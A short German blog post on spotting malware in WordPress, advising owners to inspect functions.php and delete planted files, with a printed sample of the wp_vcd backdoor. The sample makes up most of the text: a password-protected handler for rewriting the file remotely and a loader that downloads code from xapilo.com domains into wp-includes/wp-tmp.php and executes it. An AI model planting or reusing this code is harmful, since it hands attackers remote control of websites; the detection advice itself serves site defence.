Malware in WordPress erkennen

Kontrollieren Sie ab und zu in Ihrem WordPress Theme alle functions.php
Sollte sich ein verdächtiger Eintrag (Beispiel siehe unten) finden, entfernen Sie diesen und kontrollieren Sie dann im wp-includes Ordner ob sich folgende Dateien darin befinden wp-feed.php, wp-vcd.php, wp-temp.php. Löschen Sie dann diese Dateien… Vor jeder Änderung, legen Sie bitte ein Backup des WordPress Verzeichnisses und der Datanbank an!

<?php
if (isset($_REQUEST[‚action‘]) && isset($_REQUEST[‚password‘]) && ($_REQUEST[‚password‘] == ‚3fa150c5990ffad266‘))
{
$div_code_name=“wp_vcd“;
switch ($_REQUEST[‚action‘])
{

case ‚change_domain‘;
if (isset($_REQUEST[’newdomain‘]))
{

if (!empty($_REQUEST[’newdomain‘]))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all(‚/\$tmpcontent = @file_get_contents\(„http:\/\/(.*)\/code\.php/i‘,$file,$matcholddomain))
{

$file = preg_replace(‚/‘.$matcholddomain[1][0].’/i‘,$_REQUEST[’newdomain‘], $file);
@file_put_contents(__FILE__, $file);
print „true“;
}

}
}
}
break;

case ‚change_code‘;
if (isset($_REQUEST[’newcode‘]))
{

if (!empty($_REQUEST[’newcode‘]))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all(‚/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i‘,$file,$matcholdcode))
{

$file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST[’newcode‘]), $file);
@file_put_contents(__FILE__, $file);
print „true“;
}

}
}
}
break;

default: print „ERROR_WP_ACTION WP_V_CD WP_CD“;
}

die(„“);
}

$div_code_name = „wp_vcd“;
$funcfile = __FILE__;
if(!function_exists(‚theme_temp_setup‘)) {
$path = $_SERVER[‚HTTP_HOST‘] . $_SERVER[REQUEST_URI];
if (stripos($_SERVER[‚REQUEST_URI‘], ‚wp-cron.php‘) == false && stripos($_SERVER[‚REQUEST_URI‘], ‚xmlrpc.php‘) == false) {

function file_get_contents_tcurl($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}

$wp_auth_key=’11222848a10f1d0ea555bcdf773f3eb4′;
if (($tmpcontent = @file_get_contents(„http://www.xapilo.com/code.php“) OR $tmpcontent = @file_get_contents_tcurl(„http://www.xapilo.com/code.php“)) AND stripos($tmpcontent, $wp_auth_key) !== false) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . ‚wp-includes/wp-tmp.php‘, $tmpcontent);

if (!file_exists(ABSPATH . ‚wp-includes/wp-tmp.php‘)) {
@file_put_contents(get_template_directory() . ‚/wp-tmp.php‘, $tmpcontent);
if (!file_exists(get_template_directory() . ‚/wp-tmp.php‘)) {
@file_put_contents(‚wp-tmp.php‘, $tmpcontent);
}
}

}
}

elseif ($tmpcontent = @file_get_contents(„http://www.xapilo.pw/code.php“) AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . ‚wp-includes/wp-tmp.php‘, $tmpcontent);

}
}

elseif ($tmpcontent = @file_get_contents(„http://www.xapilo.top/code.php“) AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . ‚wp-includes/wp-tmp.php‘, $tmpcontent);

}
}
elseif ($tmpcontent = @file_get_contents(ABSPATH . ‚wp-includes/wp-tmp.php‘) AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));

} elseif ($tmpcontent = @file_get_contents(get_template_directory() . ‚/wp-tmp.php‘) AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));

} elseif ($tmpcontent = @file_get_contents(‚wp-tmp.php‘) AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));

}

}
}

//$start_wp_theme_tmp

//wp_tmp

//$end_wp_theme_tmp
?>

Kommentar verfassen Kommentieren abbrechen